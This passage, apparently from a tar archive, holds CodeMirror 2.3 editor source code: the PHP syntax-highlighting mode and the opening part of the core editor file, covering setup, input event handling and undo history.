        if (modeInfos[i - 1].modeName != "xml") { // Starting a CSS or JavaScript block
          if (!reBlockStartsWithNewline.test(textPortion)
              && selStart > 0) { // The block does not start with a line break
            textPortion = "\n" + textPortion;
          }
          if (!reBlockEndsWithNewline.test(textPortion)
              && selEnd < text.length - 1) { // The block does not end with a line break
            textPortion += "\n";
          }
        }
        res += modeInfos[i - 1].modeExt.autoFormatLineBreaks(textPortion);
      }
    }
    else { // Single-mode text
      res = modeInfos[0].modeExt.autoFormatLineBreaks(text.substring(startPos, endPos));
    }

    return res;
  }
};
js/layout/php.js000060400000013741152434416630007634 0ustar00(function() {
  function keywords(str) {
    var obj = {}, words = str.split(" ");
    for (var i = 0; i < words.length; ++i) obj[words[i]] = true;
    return obj;
  }
  function heredoc(delim) {
    return function(stream, state) {
      if (stream.match(delim)) state.tokenize = null;
      else stream.skipToEnd();
      return "string";
    }
  }
  var phpConfig = {
    name: "clike",
    keywords: keywords("abstract and array as break case catch class clone const continue declare default " +
                       "do else elseif enddeclare endfor endforeach endif endswitch endwhile extends final " +
                       "for foreach function global goto if implements interface instanceof namespace " +
                       "new or private protected public static switch throw trait try use var while xor " +
                       "die echo empty exit eval include include_once isset list require require_once return " +
                       "print unset __halt_compiler self static parent"),
    blockKeywords: keywords("catch do else elseif for foreach if switch try while"),
    atoms: keywords("true false null TRUE FALSE NULL"),
    multiLineStrings: true,
    hooks: {
      "$": function(stream, state) {
        stream.eatWhile(/[\w\$_]/);
        return "variable-2";
      },
      "<": function(stream, state) {
        if (stream.match(/<</)) {
          stream.eatWhile(/[\w\.]/);
          state.tokenize = heredoc(stream.current().slice(3));
          return state.tokenize(stream, state);
        }
        return false;
      },
      "#": function(stream, state) {
        while (!stream.eol() && !stream.match("?>", false)) stream.next();
        return "comment";
      },
      "/": function(stream, state) {
        if (stream.eat("/")) {
          while (!stream.eol() && !stream.match("?>", false)) stream.next();
          return "comment";
        }
        return false;
      }
    }
  };

  CodeMirror.defineMode("php", function(config, parserConfig) {
    var htmlMode = CodeMirror.getMode(config, {name: "xml", htmlMode: true});
    var jsMode = CodeMirror.getMode(config, "javascript");
    var cssMode = CodeMirror.getMode(config, "css");
    var phpMode = CodeMirror.getMode(config, phpConfig);

    function dispatch(stream, state) { // TODO open PHP inside text/css
      var isPHP = state.mode == "php";
      if (stream.sol() && state.pending != '"') state.pending = null;
      if (state.curMode == htmlMode) {
        if (stream.match(/^<\?\w*/)) {
          state.curMode = phpMode;
          state.curState = state.php;
          state.curClose = "?>";
	  state.mode = "php";
          return "meta";
        }
        if (state.pending == '"') {
          while (!stream.eol() && stream.next() != '"') {}
          var style = "string";
        } else if (state.pending && stream.pos < state.pending.end) {
          stream.pos = state.pending.end;
          var style = state.pending.style;
        } else {
          var style = htmlMode.token(stream, state.curState);
        }
        state.pending = null;
        var cur = stream.current(), openPHP = cur.search(/<\?/);
        if (openPHP != -1) {
          if (style == "string" && /\"$/.test(cur) && !/\?>/.test(cur)) state.pending = '"';
          else state.pending = {end: stream.pos, style: style};
          stream.backUp(cur.length - openPHP);
        } else if (style == "tag" && stream.current() == ">" && state.curState.context) {
          if (/^script$/i.test(state.curState.context.tagName)) {
            state.curMode = jsMode;
            state.curState = jsMode.startState(htmlMode.indent(state.curState, ""));
            state.curClose = /^<\/\s*script\s*>/i;
	    state.mode = "javascript";
          }
          else if (/^style$/i.test(state.curState.context.tagName)) {
            state.curMode = cssMode;
            state.curState = cssMode.startState(htmlMode.indent(state.curState, ""));
            state.curClose = /^<\/\s*style\s*>/i;
            state.mode = "css";
          }
        }
        return style;
      } else if ((!isPHP || state.php.tokenize == null) &&
                 stream.match(state.curClose, isPHP)) {
        state.curMode = htmlMode;
        state.curState = state.html;
        state.curClose = null;
	state.mode = "html";
        if (isPHP) return "meta";
        else return dispatch(stream, state);
      } else {
        return state.curMode.token(stream, state.curState);
      }
    }

    return {
      startState: function() {
        var html = htmlMode.startState();
        return {html: html,
                php: phpMode.startState(),
                curMode: parserConfig.startOpen ? phpMode : htmlMode,
                curState: parserConfig.startOpen ? phpMode.startState() : html,
                curClose: parserConfig.startOpen ? /^\?>/ : null,
		mode: parserConfig.startOpen ? "php" : "html",
                pending: null}
      },

      copyState: function(state) {
        var html = state.html, htmlNew = CodeMirror.copyState(htmlMode, html),
            php = state.php, phpNew = CodeMirror.copyState(phpMode, php), cur;
        if (state.curState == html) cur = htmlNew;
        else if (state.curState == php) cur = phpNew;
        else cur = CodeMirror.copyState(state.curMode, state.curState);
        return {html: htmlNew, php: phpNew, curMode: state.curMode, curState: cur,
                curClose: state.curClose, mode: state.mode,
                pending: state.pending};
      },

      token: dispatch,

      indent: function(state, textAfter) {
        if ((state.curMode != phpMode && /^\s*<\//.test(textAfter)) ||
            (state.curMode == phpMode && /^\?>/.test(textAfter)))
          return htmlMode.indent(state.html, textAfter);
        return state.curMode.indent(state.curState, textAfter);
      },

      electricChars: "/{}:"
    }
  }, "xml", "clike", "javascript", "css");
  CodeMirror.defineMIME("application/x-httpd-php", "php");
  CodeMirror.defineMIME("application/x-httpd-php-open", {name: "php", startOpen: true});
  CodeMirror.defineMIME("text/x-php", phpConfig);
})();
js/layout/codemirror.js000060400000400724152434416630011213 0ustar00// CodeMirror version 2.3
//
// All functions that need access to the editor's state live inside
// the CodeMirror function. Below that, at the bottom of the file,
// some utilities are defined.

// CodeMirror is the only global var we claim
var CodeMirror = (function() {
  // This is the function that produces an editor instance. Its
  // closure is used to store the editor state.
  function CodeMirror(place, givenOptions) {
    // Determine effective options based on given values and defaults.
    var options = {}, defaults = CodeMirror.defaults;
    for (var opt in defaults)
      if (defaults.hasOwnProperty(opt))
        options[opt] = (givenOptions && givenOptions.hasOwnProperty(opt) ? givenOptions : defaults)[opt];

    // The element in which the editor lives.
    var wrapper = document.createElement("div");
    wrapper.className = "CodeMirror" + (options.lineWrapping ? " CodeMirror-wrap" : "");
    // This mess creates the base DOM structure for the editor.
    wrapper.innerHTML =
      '<div style="overflow: hidden; position: relative; width: 3px; height: 0px;">' + // Wraps and hides input textarea
        '<textarea style="position: absolute; padding: 0; width: 1px; height: 1em" wrap="off" ' +
          'autocorrect="off" autocapitalize="off"></textarea></div>' +
      '<div class="CodeMirror-scrollbar">' + // The vertical scrollbar. Horizontal scrolling is handled by the scroller itself.
        '<div class="CodeMirror-scrollbar-inner">' + // The empty scrollbar content, used solely for managing the scrollbar thumb.
      '</div></div>' + // This must be before the scroll area because it's float-right.
      '<div class="CodeMirror-scroll" tabindex="-1">' +
        '<div style="position: relative">' + // Set to the height of the text, causes scrolling
          '<div style="position: relative">' + // Moved around its parent to cover visible view
            '<div class="CodeMirror-gutter"><div class="CodeMirror-gutter-text"></div></div>' +
            // Provides positioning relative to (visible) text origin
            '<div class="CodeMirror-lines"><div style="position: relative; z-index: 0">' +
              // Used to measure text size
              '<div style="position: absolute; width: 100%; height: 0; overflow: hidden; visibility: hidden;"></div>' +
              '<pre class="CodeMirror-cursor">&#160;</pre>' + // Absolutely positioned blinky cursor
              '<pre class="CodeMirror-cursor" style="visibility: hidden">&#160;</pre>' + // Used to force a width
              '<div style="position: relative; z-index: -1"></div><div></div>' + // DIVs containing the selection and the actual code
            '</div></div></div></div></div>';
    if (place.appendChild) place.appendChild(wrapper); else place(wrapper);
    // I've never seen more elegant code in my life.
    var inputDiv = wrapper.firstChild, input = inputDiv.firstChild,
        scroller = wrapper.lastChild, code = scroller.firstChild,
        mover = code.firstChild, gutter = mover.firstChild, gutterText = gutter.firstChild,
        lineSpace = gutter.nextSibling.firstChild, measure = lineSpace.firstChild,
        cursor = measure.nextSibling, widthForcer = cursor.nextSibling,
        selectionDiv = widthForcer.nextSibling, lineDiv = selectionDiv.nextSibling,
        scrollbar = inputDiv.nextSibling, scrollbarInner = scrollbar.firstChild;
    themeChanged(); keyMapChanged();
    // Needed to hide big blue blinking cursor on Mobile Safari
    if (ios) input.style.width = "0px";
    if (!webkit) scroller.draggable = true;
    lineSpace.style.outline = "none";
    if (options.tabindex != null) input.tabIndex = options.tabindex;
    if (options.autofocus) focusInput();
    if (!options.gutter && !options.lineNumbers) gutter.style.display = "none";
    // Needed to handle Tab key in KHTML
    if (khtml) inputDiv.style.height = "1px", inputDiv.style.position = "absolute";

    // Check for OS X >= 10.7. If so, we need to force a width on the scrollbar, and 
    // make it overlap the content. (But we only do this if the scrollbar doesn't already
    // have a natural width. If the mouse is plugged in or the user sets the system pref
    // to always show scrollbars, the scrollbar shouldn't overlap.)
    if (mac_geLion) {
      scrollbar.className += (overlapScrollbars() ? " cm-sb-overlap" : " cm-sb-nonoverlap");
    } else if (ie_lt8) {
      // Need to set a minimum width to see the scrollbar on IE7 (but must not set it on IE8).
      scrollbar.className += " cm-sb-ie7";
    }

    // Check for problem with IE innerHTML not working when we have a
    // P (or similar) parent node.
    try { stringWidth("x"); }
    catch (e) {
      if (e.message.match(/runtime/i))
        e = new Error("A CodeMirror inside a P-style element does not work in Internet Explorer. (innerHTML bug)");
      throw e;
    }

    // Delayed object wrap timeouts, making sure only one is active. blinker holds an interval.
    var poll = new Delayed(), highlight = new Delayed(), blinker;

    // mode holds a mode API object. doc is the tree of Line objects,
    // work an array of lines that should be parsed, and history the
    // undo history (instance of History constructor).
    var mode, doc = new BranchChunk([new LeafChunk([new Line("")])]), work, focused;
    loadMode();
    // The selection. These are always maintained to point at valid
    // positions. Inverted is used to remember that the user is
    // selecting bottom-to-top.
    var sel = {from: {line: 0, ch: 0}, to: {line: 0, ch: 0}, inverted: false};
    // Selection-related flags. shiftSelecting obviously tracks
    // whether the user is holding shift.
    var shiftSelecting, lastClick, lastDoubleClick, lastScrollTop = 0, lastScrollLeft = 0, draggingText,
        overwrite = false, suppressEdits = false;
    // Variables used by startOperation/endOperation to track what
    // happened during the operation.
    var updateInput, userSelChange, changes, textChanged, selectionChanged, leaveInputAlone,
        gutterDirty, callbacks;
    // Current visible range (may be bigger than the view window).
    var displayOffset = 0, showingFrom = 0, showingTo = 0, lastSizeC = 0;
    // bracketHighlighted is used to remember that a bracket has been
    // marked.
    var bracketHighlighted;
    // Tracks the maximum line length so that the horizontal scrollbar
    // can be kept static when scrolling.
    var maxLine = "", updateMaxLine = false, maxLineChanged = true;
    var tabCache = {};

    // Initialize the content.
    operation(function(){setValue(options.value || ""); updateInput = false;})();
    var history = new History();

    // Register our event handlers.
    connect(scroller, "mousedown", operation(onMouseDown));
    connect(scroller, "dblclick", operation(onDoubleClick));
    connect(lineSpace, "selectstart", e_preventDefault);
    // Gecko browsers fire contextmenu *after* opening the menu, at
    // which point we can't mess with it anymore. Context menu is
    // handled in onMouseDown for Gecko.
    if (!gecko) connect(scroller, "contextmenu", onContextMenu);
    connect(scroller, "scroll", onScroll);
    connect(scrollbar, "scroll", onScroll);
    connect(scrollbar, "mousedown", function() {setTimeout(focusInput, 0);});
    connect(scroller, "mousewheel", onMouseWheel);
    connect(scroller, "DOMMouseScroll", onMouseWheel);
    connect(window, "resize", function() {updateDisplay(true);});
    connect(input, "keyup", operation(onKeyUp));
    connect(input, "input", fastPoll);
    connect(input, "keydown", operation(onKeyDown));
    connect(input, "keypress", operation(onKeyPress));
    connect(input, "focus", onFocus);
    connect(input, "blur", onBlur);

    if (options.dragDrop) {
      connect(scroller, "dragstart", onDragStart);
      function drag_(e) {
        if (options.onDragEvent && options.onDragEvent(instance, addStop(e))) return;
        e_stop(e);
      }
      connect(scroller, "dragenter", drag_);
      connect(scroller, "dragover", drag_);
      connect(scroller, "drop", operation(onDrop));
    }
    connect(scroller, "paste", function(){focusInput(); fastPoll();});
    connect(input, "paste", fastPoll);
    connect(input, "cut", operation(function(){
      if (!options.readOnly) replaceSelection("");
    }));

    // Needed to handle Tab key in KHTML
    if (khtml) connect(code, "mouseup", function() {
        if (document.activeElement == input) input.blur();
        focusInput();
    });

    // IE throws unspecified error in certain cases, when
    // trying to access activeElement before onload
    var hasFocus; try { hasFocus = (document.activeElement == input); } catch(e) { }
    if (hasFocus || options.autofocus) setTimeout(onFocus, 20);
    else onBlur();

    function isLine(l) {return l >= 0 && l < doc.size;}
    // The instance object that we'll return. Mostly calls out to
    // local functions in the CodeMirror function. Some do some extra
    // range checking and/or clipping. operation is used to wrap the
    // call so that changes it makes are tracked, and the display is
    // updated afterwards.
    var instance = wrapper.CodeMirror = {
      getValue: getValue,
      setValue: operation(setValue),
      getSelection: getSelection,
      replaceSelection: operation(replaceSelection),
      focus: function(){window.focus(); focusInput(); onFocus(); fastPoll();},
      setOption: function(option, value) {
        var oldVal = options[option];
        options[option] = value;
        if (option == "mode" || option == "indentUnit") loadMode();
        else if (option == "readOnly" && value == "nocursor") {onBlur(); input.blur();}
        else if (option == "readOnly" && !value) {resetInput(true);}
        else if (option == "theme") themeChanged();
        else if (option == "lineWrapping" && oldVal != value) operation(wrappingChanged)();
        else if (option == "tabSize") updateDisplay(true);
        else if (option == "keyMap") keyMapChanged();
        if (option == "lineNumbers" || option == "gutter" || option == "firstLineNumber" || option == "theme") {
          gutterChanged();
          updateDisplay(true);
        }
      },
      getOption: function(option) {return options[option];},
      undo: operation(undo),
      redo: operation(redo),
      indentLine: operation(function(n, dir) {
        if (typeof dir != "string") {
          if (dir == null) dir = options.smartIndent ? "smart" : "prev";
          else dir = dir ? "add" : "subtract";
        }
        if (isLine(n)) indentLine(n, dir);
      }),
      indentSelection: operation(indentSelected),
      historySize: function() {return {undo: history.done.length, redo: history.undone.length};},
      clearHistory: function() {history = new History();},
      matchBrackets: operation(function(){matchBrackets(true);}),
      getTokenAt: operation(function(pos) {
        pos = clipPos(pos);
        return getLine(pos.line).getTokenAt(mode, getStateBefore(pos.line), pos.ch);
      }),
      getStateAfter: function(line) {
        line = clipLine(line == null ? doc.size - 1: line);
        return getStateBefore(line + 1);
      },
      cursorCoords: function(start, mode) {
        if (start == null) start = sel.inverted;
        return this.charCoords(start ? sel.from : sel.to, mode);
      },
      charCoords: function(pos, mode) {
        pos = clipPos(pos);
        if (mode == "local") return localCoords(pos, false);
        if (mode == "div") return localCoords(pos, true);
        return pageCoords(pos);
      },
      coordsChar: function(coords) {
        var off = eltOffset(lineSpace);
        return coordsChar(coords.x - off.left, coords.y - off.top);
      },
      markText: operation(markText),
      setBookmark: setBookmark,
      findMarksAt: findMarksAt,
      setMarker: operation(addGutterMarker),
      clearMarker: operation(removeGutterMarker),
      setLineClass: operation(setLineClass),
      hideLine: operation(function(h) {return setLineHidden(h, true);}),
      showLine: operation(function(h) {return setLineHidden(h, false);}),
      onDeleteLine: function(line, f) {
        if (typeof line == "number") {
          if (!isLine(line)) return null;
          line = getLine(line);
        }
        (line.handlers || (line.handlers = [])).push(f);
        return line;
      },
      lineInfo: lineInfo,
      addWidget: function(pos, node, scroll, vert, horiz) {
        pos = localCoords(clipPos(pos));
        var top = pos.yBot, left = pos.x;
        node.style.position = "absolute";
        code.appendChild(node);
        if (vert == "over") top = pos.y;
        else if (vert == "near") {
          var vspace = Math.max(scroller.offsetHeight, doc.height * textHeight()),
              hspace = Math.max(code.clientWidth, lineSpace.clientWidth) - paddingLeft();
          if (pos.yBot + node.offsetHeight > vspace && pos.y > node.offsetHeight)
            top = pos.y - node.offsetHeight;
          if (left + node.offsetWidth > hspace)
            left = hspace - node.offsetWidth;
        }
        node.style.top = (top + paddingTop()) + "px";
        node.style.left = node.style.right = "";
        if (horiz == "right") {
          left = code.clientWidth - node.offsetWidth;
          node.style.right = "0px";
        } else {
          if (horiz == "left") left = 0;
          else if (horiz == "middle") left = (code.clientWidth - node.offsetWidth) / 2;
          node.style.left = (left + paddingLeft()) + "px";
        }
        if (scroll)
          scrollIntoView(left, top, left + node.offsetWidth, top + node.offsetHeight);
      },

      lineCount: function() {return doc.size;},
      clipPos: clipPos,
      getCursor: function(start) {
        if (start == null) start = sel.inverted;
        return copyPos(start ? sel.from : sel.to);
      },
      somethingSelected: function() {return !posEq(sel.from, sel.to);},
      setCursor: operation(function(line, ch, user) {
        if (ch == null && typeof line.line == "number") setCursor(line.line, line.ch, user);
        else setCursor(line, ch, user);
      }),
      setSelection: operation(function(from, to, user) {
        (user ? setSelectionUser : setSelection)(clipPos(from), clipPos(to || from));
      }),
      getLine: function(line) {if (isLine(line)) return getLine(line).text;},
      getLineHandle: function(line) {if (isLine(line)) return getLine(line);},
      setLine: operation(function(line, text) {
        if (isLine(line)) replaceRange(text, {line: line, ch: 0}, {line: line, ch: getLine(line).text.length});
      }),
      removeLine: operation(function(line) {
        if (isLine(line)) replaceRange("", {line: line, ch: 0}, clipPos({line: line+1, ch: 0}));
      }),
      replaceRange: operation(replaceRange),
      getRange: function(from, to) {return getRange(clipPos(from), clipPos(to));},

      triggerOnKeyDown: operation(onKeyDown),
      execCommand: function(cmd) {return commands[cmd](instance);},
      // Stuff used by commands, probably not much use to outside code.
      moveH: operation(moveH),
      deleteH: operation(deleteH),
      moveV: operation(moveV),
      toggleOverwrite: function() {
        if(overwrite){
          overwrite = false;
          cursor.className = cursor.className.replace(" CodeMirror-overwrite", "");
        } else {
          overwrite = true;
          cursor.className += " CodeMirror-overwrite";
        }
      },

      posFromIndex: function(off) {
        var lineNo = 0, ch;
        doc.iter(0, doc.size, function(line) {
          var sz = line.text.length + 1;
          if (sz > off) { ch = off; return true; }
          off -= sz;
          ++lineNo;
        });
        return clipPos({line: lineNo, ch: ch});
      },
      indexFromPos: function (coords) {
        if (coords.line < 0 || coords.ch < 0) return 0;
        var index = coords.ch;
        doc.iter(0, coords.line, function (line) {
          index += line.text.length + 1;
        });
        return index;
      },
      scrollTo: function(x, y) {
        if (x != null) scroller.scrollLeft = x;
        if (y != null) scrollbar.scrollTop = y;
        updateDisplay([]);
      },
      getScrollInfo: function() {
        return {x: scroller.scrollLeft, y: scrollbar.scrollTop,
                height: scrollbar.scrollHeight, width: scroller.scrollWidth};
      },

      operation: function(f){return operation(f)();},
      compoundChange: function(f){return compoundChange(f);},
      refresh: function(){
        updateDisplay(true);
        if (scrollbar.scrollHeight > lastScrollTop)
          scrollbar.scrollTop = lastScrollTop;
      },
      getInputField: function(){return input;},
      getWrapperElement: function(){return wrapper;},
      getScrollerElement: function(){return scroller;},
      getGutterElement: function(){return gutter;}
    };

    function getLine(n) { return getLineAt(doc, n); }
    function updateLineHeight(line, height) {
      gutterDirty = true;
      var diff = height - line.height;
      for (var n = line; n; n = n.parent) n.height += diff;
    }

    function setValue(code) {
      var top = {line: 0, ch: 0};
      updateLines(top, {line: doc.size - 1, ch: getLine(doc.size-1).text.length},
                  splitLines(code), top, top);
      updateInput = true;
    }
    function getValue() {
      var text = [];
      doc.iter(0, doc.size, function(line) { text.push(line.text); });
      return text.join("\n");
    }

    function onScroll(e) {
      if (lastScrollTop != scrollbar.scrollTop || lastScrollLeft != scroller.scrollLeft) {
        lastScrollTop = scrollbar.scrollTop;
        lastScrollLeft = scroller.scrollLeft;
        updateDisplay([]);
        if (options.fixedGutter) gutter.style.left = scroller.scrollLeft + "px";
        if (options.onScroll) options.onScroll(instance);
      }
    }

    function onMouseDown(e) {
      setShift(e_prop(e, "shiftKey"));
      // Check whether this is a click in a widget
      for (var n = e_target(e); n != wrapper; n = n.parentNode)
        if (n.parentNode == code && n != mover) return;

      // See if this is a click in the gutter
      for (var n = e_target(e); n != wrapper; n = n.parentNode)
        if (n.parentNode == gutterText) {
          if (options.onGutterClick)
            options.onGutterClick(instance, indexOf(gutterText.childNodes, n) + showingFrom, e);
          return e_preventDefault(e);
        }

      var start = posFromMouse(e);

      switch (e_button(e)) {
      case 3:
        if (gecko && !mac) onContextMenu(e);
        return;
      case 2:
        if (start) setCursor(start.line, start.ch, true);
        setTimeout(focusInput, 20);
        e_preventDefault(e);
        return;
      }
      // For button 1, if it was clicked inside the editor
      // (posFromMouse returning non-null), we have to adjust the
      // selection.
      if (!start) {if (e_target(e) == scroller) e_preventDefault(e); return;}

      if (!focused) onFocus();

      var now = +new Date;
      if (lastDoubleClick && lastDoubleClick.time > now - 400 && posEq(lastDoubleClick.pos, start)) {
        e_preventDefault(e);
        setTimeout(focusInput, 20);
        return selectLine(start.line);
      } else if (lastClick && lastClick.time > now - 400 && posEq(lastClick.pos, start)) {
        lastDoubleClick = {time: now, pos: start};
        e_preventDefault(e);
        return selectWordAt(start);
      } else { lastClick = {time: now, pos: start}; }

      var last = start, going;
      if (options.dragDrop && dragAndDrop && !options.readOnly && !posEq(sel.from, sel.to) &&
          !posLess(start, sel.from) && !posLess(sel.to, start)) {
        // Let the drag handler handle this.
        if (webkit) scroller.draggable = true;
        function dragEnd(e2) {
          if (webkit) scroller.draggable = false;
          draggingText = false;
          up(); drop();
          if (Math.abs(e.clientX - e2.clientX) + Math.abs(e.clientY - e2.clientY) < 10) {
            e_preventDefault(e2);
            setCursor(start.line, start.ch, true);
            focusInput();
          }
        }
        var up = connect(document, "mouseup", operation(dragEnd), true);
        var drop = connect(scroller, "drop", operation(dragEnd), true);
        draggingText = true;
        // IE's approach to draggable
        if (scroller.dragDrop) scroller.dragDrop();
        return;
      }
      e_preventDefault(e);
      setCursor(start.line, start.ch, true);

      function extend(e) {
        var cur = posFromMouse(e, true);
        if (cur && !posEq(cur, last)) {
          if (!focused) onFocus();
          last = cur;
          setSelectionUser(start, cur);
          updateInput = false;
          var visible = visibleLines();
          if (cur.line >= visible.to || cur.line < visible.from)
            going = setTimeout(operation(function(){extend(e);}), 150);
        }
      }

      function done(e) {
        clearTimeout(going);
        var cur = posFromMouse(e);
        if (cur) setSelectionUser(start, cur);
        e_preventDefault(e);
        focusInput();
        updateInput = true;
        move(); up();
      }
      var move = connect(document, "mousemove", operation(function(e) {
        clearTimeout(going);
        e_preventDefault(e);
        if (!ie && !e_button(e)) done(e);
        else extend(e);
      }), true);
      var up = connect(document, "mouseup", operation(done), true);
    }
    function onDoubleClick(e) {
      for (var n = e_target(e); n != wrapper; n = n.parentNode)
        if (n.parentNode == gutterText) return e_preventDefault(e);
      var start = posFromMouse(e);
      if (!start) return;
      lastDoubleClick = {time: +new Date, pos: start};
      e_preventDefault(e);
      selectWordAt(start);
    }
    function onDrop(e) {
      if (options.onDragEvent && options.onDragEvent(instance, addStop(e))) return;
      e.preventDefault();
      var pos = posFromMouse(e, true), files = e.dataTransfer.files;
      if (!pos || options.readOnly) return;
      if (files && files.length && window.FileReader && window.File) {
        function loadFile(file, i) {
          var reader = new FileReader;
          reader.onload = function() {
            text[i] = reader.result;
            if (++read == n) {
              pos = clipPos(pos);
              operation(function() {
                var end = replaceRange(text.join(""), pos, pos);
                setSelectionUser(pos, end);
              })();
            }
          };
          reader.readAsText(file);
        }
        var n = files.length, text = Array(n), read = 0;
        for (var i = 0; i < n; ++i) loadFile(files[i], i);
      } else {
        // Don't do a replace if the drop happened inside of the selected text.
        if (draggingText && !(posLess(pos, sel.from) || posLess(sel.to, pos))) return;
        try {
          var text = e.dataTransfer.getData("Text");
          if (text) {
            compoundChange(function() {
              var curFrom = sel.from, curTo = sel.to;
              setSelectionUser(pos, pos);
              if (draggingText) replaceRange("", curFrom, curTo);
              replaceSelection(text);
              focusInput();
            });
          }
        }
        catch(e){}
      }
    }
    function onDragStart(e) {
      var txt = getSelection();
      e.dataTransfer.setData("Text", txt);
      
      // Use dummy image instead of default browsers image.
      if (gecko || chrome || opera) {
        var img = document.createElement('img');
        img.scr = 'data:image/gif;base64,R0lGODdhAgACAIAAAAAAAP///ywAAAAAAgACAAACAoRRADs='; //1x1 image
        e.dataTransfer.setDragImage(img, 0, 0);
      }
    }

    function doHandleBinding(bound, dropShift) {
      if (typeof bound == "string") {
        bound = commands[bound];
        if (!bound) return false;
      }
      var prevShift = shiftSelecting;
      try {
        if (options.readOnly) suppressEdits = true;
        if (dropShift) shiftSelecting = null;
        bound(instance);
      } catch(e) {
        if (e != Pass) throw e;
        return false;
      } finally {
        shiftSelecting = prevShift;
        suppressEdits = false;
      }
      return true;
    }
    function handleKeyBinding(e) {
      // Handle auto keymap transitions
      var startMap = getKeyMap(options.keyMap), next = startMap.auto;
      clearTimeout(maybeTransition);
      if (next && !isModifierKey(e)) maybeTransition = setTimeout(function() {
        if (getKeyMap(options.keyMap) == startMap) {
          options.keyMap = (next.call ? next.call(null, instance) : next);
        }
      }, 50);

      var name = keyNames[e_prop(e, "keyCode")], handled = false;
      if (name == null || e.altGraphKey) return false;
      if (e_prop(e, "altKey")) name = "Alt-" + name;
      if (e_prop(e, "ctrlKey")) name = "Ctrl-" + name;
      if (e_prop(e, "metaKey")) name = "Cmd-" + name;

      var stopped = false;
      function stop() { stopped = true; }

      if (e_prop(e, "shiftKey")) {
        handled = lookupKey("Shift-" + name, options.extraKeys, options.keyMap,
                            function(b) {return doHandleBinding(b, true);}, stop)
               || lookupKey(name, options.extraKeys, options.keyMap, function(b) {
                 if (typeof b == "string" && /^go[A-Z]/.test(b)) return doHandleBinding(b);
               }, stop);
      } else {
        handled = lookupKey(name, options.extraKeys, options.keyMap, doHandleBinding, stop);
      }
      if (stopped) handled = false;
      if (handled) {
        e_preventDefault(e);
        restartBlink();
        if (ie) { e.oldKeyCode = e.keyCode; e.keyCode = 0; }
      }
      return handled;
    }
    function handleCharBinding(e, ch) {
      var handled = lookupKey("'" + ch + "'", options.extraKeys,
                              options.keyMap, function(b) { return doHandleBinding(b, true); });
      if (handled) {
        e_preventDefault(e);
        restartBlink();
      }
      return handled;
    }

    var lastStoppedKey = null, maybeTransition;
    function onKeyDown(e) {
      if (!focused) onFocus();
      if (ie && e.keyCode == 27) { e.returnValue = false; }
      if (pollingFast) { if (readInput()) pollingFast = false; }
      if (options.onKeyEvent && options.onKeyEvent(instance, addStop(e))) return;
      var code = e_prop(e, "keyCode");
      // IE does strange things with escape.
      setShift(code == 16 || e_prop(e, "shiftKey"));
      // First give onKeyEvent option a chance to handle this.
      var handled = handleKeyBinding(e);
      if (opera) {
        lastStoppedKey = handled ? code : null;
        // Opera has no cut event... we try to at least catch the key combo
        if (!handled && code == 88 && e_prop(e, mac ? "metaKey" : "ctrlKey"))
          replaceSelection("");
      }
    }
    function onKeyPress(e) {
      if (pollingFast) readInput();
      if (options.onKeyEvent && options.onKeyEvent(instance, addStop(e))) return;
      var keyCode = e_prop(e, "keyCode"), charCode = e_prop(e, "charCode");
      if (opera && keyCode == lastStoppedKey) {lastStoppedKey = null; e_preventDefault(e); return;}
      if (((opera && (!e.which || e.which < 10)) || khtml) && handleKeyBinding(e)) return;
      var ch = String.fromCharCode(charCode == null ? keyCode : charCode);
      if (options.electricChars && mode.electricChars && options.smartIndent && !options.readOnly) {
        if (mode.electricChars.indexOf(ch) > -1)
          setTimeout(operation(function() {indentLine(sel.to.line, "smart");}), 75);
      }
      if (handleCharBinding(e, ch)) return;
      fastPoll();
    }
    function onKeyUp(e) {
      if (options.onKeyEvent && options.onKeyEvent(instance, addStop(e))) return;
      if (e_prop(e, "keyCode") == 16) shiftSelecting = null;
    }

    function onFocus() {
      if (options.readOnly == "nocursor") return;
      if (!focused) {
        if (options.onFocus) options.onFocus(instance);
        focused = true;
        if (scroller.className.search(/\bCodeMirror-focused\b/) == -1)
          scroller.className += " CodeMirror-focused";
        if (!leaveInputAlone) resetInput(true);
      }
      slowPoll();
      restartBlink();
    }
    function onBlur() {
      if (focused) {
        if (options.onBlur) options.onBlur(instance);
        focused = false;
        if (bracketHighlighted)
          operation(function(){
            if (bracketHighlighted) { bracketHighlighted(); bracketHighlighted = null; }
          })();
        scroller.className = scroller.className.replace(" CodeMirror-focused", "");
      }
      clearInterval(blinker);
      setTimeout(function() {if (!focused) shiftSelecting = null;}, 150);
    }

    function chopDelta(delta) {
      // Make sure we always scroll a little bit for any nonzero delta.
      if (delta > 0.0 && delta < 1.0) return 1;
      else if (delta > -1.0 && delta < 0.0) return -1;
      else return Math.round(delta);
    }

    function onMouseWheel(e) {
      var deltaX = 0, deltaY = 0;
      if (e.type == "DOMMouseScroll") { // Firefox
        var delta = -e.detail * 8.0;
        if (e.axis == e.HORIZONTAL_AXIS) deltaX = delta;
        else if (e.axis == e.VERTICAL_AXIS) deltaY = delta;
      } else if (e.wheelDeltaX !== undefined && e.wheelDeltaY !== undefined) { // WebKit
        deltaX = e.wheelDeltaX / 3.0;
        deltaY = e.wheelDeltaY / 3.0;
      } else if (e.wheelDelta !== undefined) { // IE or Opera
        deltaY = e.wheelDelta / 3.0;
      }

      var scrolled = false;
      deltaX = chopDelta(deltaX);
      deltaY = chopDelta(deltaY);
      if ((deltaX > 0 && scroller.scrollLeft > 0) ||
          (deltaX < 0 && scroller.scrollLeft + scroller.clientWidth < scroller.scrollWidth)) {
        scroller.scrollLeft -= deltaX;
        scrolled = true;
      }
      if ((deltaY > 0 && scrollbar.scrollTop > 0) ||
          (deltaY < 0 && scrollbar.scrollTop + scrollbar.clientHeight < scrollbar.scrollHeight)) {
        scrollbar.scrollTop -= deltaY;
        scrolled = true;
      }
      if (scrolled) e_stop(e);
    }

    // Replace the range from from to to by the strings in newText.
    // Afterwards, set the selection to selFrom, selTo.
    function updateLines(from, to, newText, selFrom, selTo) {
      if (suppressEdits) return;
      if (history) {
        var old = [];
        doc.iter(from.line, to.line + 1, function(line) { old.push(line.text); });
        history.addChange(from.line, newText.length, old);
        while (history.done.length > options.undoDepth) history.done.shift();
      }
      updateLinesNoUndo(from, to, newText, selFrom, selTo);
    }
    function unredoHelper(from, to) {
      if (!from.length) return;
      var set = from.pop(), out = [];
      for (var i = set.length - 1; i >= 0; i -= 1) {
        var change = set[i];
        var replaced = [], end = change.start + change.added;
        doc.iter(change.start, end, function(line) { replaced.push(line.text); });
        out.push({start: change.start, added: change.old.length, old: replaced});
        var pos = {line: change.start + change.old.length - 1,
